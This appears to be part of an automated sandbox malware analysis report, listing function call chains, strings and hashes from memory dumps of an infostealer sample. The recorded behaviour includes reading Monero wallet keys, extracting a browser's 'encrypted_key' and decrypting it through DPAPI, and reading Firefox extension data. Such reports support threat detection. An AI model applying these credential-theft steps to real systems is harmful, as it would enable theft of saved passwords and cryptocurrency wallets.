                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
                                        • Instruction ID: 279a6ee8225319dc874bfb3a2534e5b3b3551fdfdd98f904384b66552a12992a
                                        • Opcode Fuzzy Hash: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
                                        • Instruction Fuzzy Hash: A48122729101289BCB14FBA4EDA6EEE73B9AF14300F485578F50776091EF356A08CB72
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: a5a8191c12151f05d4238b09e48612d0be5ecad35ec131f8f9c0b83437aa856e
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 9451E272600206AFEF29AF54C841BBA77B5FF01314F24652DEA0DA7691E731ED40DB90
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E1A664
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 20093484f9adeb8a4f70307dc89445f11f54ae4ea34f8e57422b7fb13496e920
                                        • Instruction ID: cc090cc6cc932f646edc29601f60bcf28115458f8e96c97c40365b7ae545ac19
                                        • Opcode Fuzzy Hash: 20093484f9adeb8a4f70307dc89445f11f54ae4ea34f8e57422b7fb13496e920
                                        • Instruction Fuzzy Hash: F6513DB0A10208EFDB14EFA4DD96BED77B6BF40344F08A128F90A7B191DB706A45CB51
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E31678,00E30D93), ref: 00E1F64C
                                        • lstrlen.KERNEL32(00000000), ref: 00E1F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
                                        • Instruction ID: 9f2bfd2d91f9c73a7666ddc3ff0a483bf4de027cf998683a801bf60e424c849b
                                        • Opcode Fuzzy Hash: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
                                        • Instruction Fuzzy Hash: 5C510F72D102189BCB04FBA4EDA6DED77B9AF54300F489578F81777191EE346A08CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 95f989fb2b27ab26a34e32d9b6b841c8b41c1067e193cd93bb1ff0f48302a991
                                        • Instruction ID: 06b3bb232c33d033451947e3cd9275383882d9da17ad9dc7508285469407ec8f
                                        • Opcode Fuzzy Hash: 95f989fb2b27ab26a34e32d9b6b841c8b41c1067e193cd93bb1ff0f48302a991
                                        • Instruction Fuzzy Hash: 7F417371E002199FCB18EFB4E855AEEB7B8AF54304F049028F5167B185EB74AA45CF91
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                          • Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                          • Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                          • Part of subcall function 00E1A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
                                          • Part of subcall function 00E1A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
                                          • Part of subcall function 00E1A2B0: LocalFree.KERNEL32(?), ref: 00E1A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 537d829f36db752d0a41dc81138c9f54e0fb1883bcf5652724a622482c24fc59
                                        • Instruction ID: 84da31763fcb771825ae63ff5b1fc5976108cbe67f11f6d236aa2d73d2ce2bf2
                                        • Opcode Fuzzy Hash: 537d829f36db752d0a41dc81138c9f54e0fb1883bcf5652724a622482c24fc59
                                        • Instruction Fuzzy Hash: E23152B6D01209ABCF04DB94DD45AFFB7B9AF58344F085568E901B7241E7319E44CBA1
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E305BF), ref: 00E2885A
                                        • Process32First.KERNEL32(?,00000128), ref: 00E2886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00E28883
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • CloseHandle.KERNEL32(?), ref: 00E288F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
                                        • Instruction ID: 88eed0d9c8d4584ffaaa926648a2907a0f92150e17fddb49cc88d8fd470c47ab
                                        • Opcode Fuzzy Hash: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
                                        • Instruction Fuzzy Hash: A5318D71901228ABCB24DF95ED52FEEB7B8FF04700F5441A9F10AB6190DB306A44CFA1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 2f929bb7a391d3ff25ecba40bd61cca947171eb8c62abbea80c78b1bb460ea31
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 9C01D432609726EEFE3436745CC99A73694EB017B97305379F21EA01F2EF924C419240
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B54
                                        • wsprintfA.USER32 ref: 00E27B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
                                        • Instruction ID: ed519855a73d7948463fd34376229ab2b41c3f45d7695535ac83daebb2b41110
                                        • Opcode Fuzzy Hash: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
                                        • Instruction Fuzzy Hash: BE113CB2904218ABCB24DFCAED45BBEBBF8FB4CB11F10411AF645A6284D3395940C7B0
                                        APIs
                                        • __getptd.LIBCMT ref: 00E2CA7E
                                          • Part of subcall function 00E2C2A0: __amsg_exit.LIBCMT ref: 00E2C2B0
                                        • __getptd.LIBCMT ref: 00E2CA95
                                        • __amsg_exit.LIBCMT ref: 00E2CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00E2CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
                                        • Instruction ID: b5039f36480d9c156ceaabb47e625f4c36b7107346e14b6c9d8bc05ed6827b79
                                        • Opcode Fuzzy Hash: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
                                        • Instruction Fuzzy Hash: A1F06773944738DBD620FBA8F806B4E37E0AF00724F30314AE507B62E2CB6459808B96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: dd0f7aa9a762ebe7e25aebd1cfc48575c1d8e8952f4f583fd639b8bf0d9f6191
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 15415871900209EFCF25DF98DC81AAEBBB5EF48304F599199FA0876251D3359A90DF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: T8
                                        • API String ID: 0-1243456643
                                        • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                        • Instruction ID: cbd5733198006f98867c2fb86eb96e52c7e5a26a5da37156339eef07932e74a7
                                        • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                        • Instruction Fuzzy Hash: 61216DF1600205BF9F20AFB1C8C18AB77E9AF04368714661AFA25A7651E731EE4087A0
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E251CA
                                        • lstrcat.KERNEL32(?,00E31058), ref: 00E251E7
                                        • lstrcat.KERNEL32(?,01A88AB8), ref: 00E251FB
                                        • lstrcat.KERNEL32(?,00E3105C), ref: 00E2520D
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
                                          • Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                          • Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                          • Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
                                        • Instruction ID: 12544aa8caf3deda88e881d4a20ddfa7824d763df5b56e7eaf64fa4a3f78c7a2
                                        • Opcode Fuzzy Hash: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
                                        • Instruction Fuzzy Hash: 20212FB6900208A7C724F770FC46EED33BC9B54700F404598F685A6185EE7596C8CF91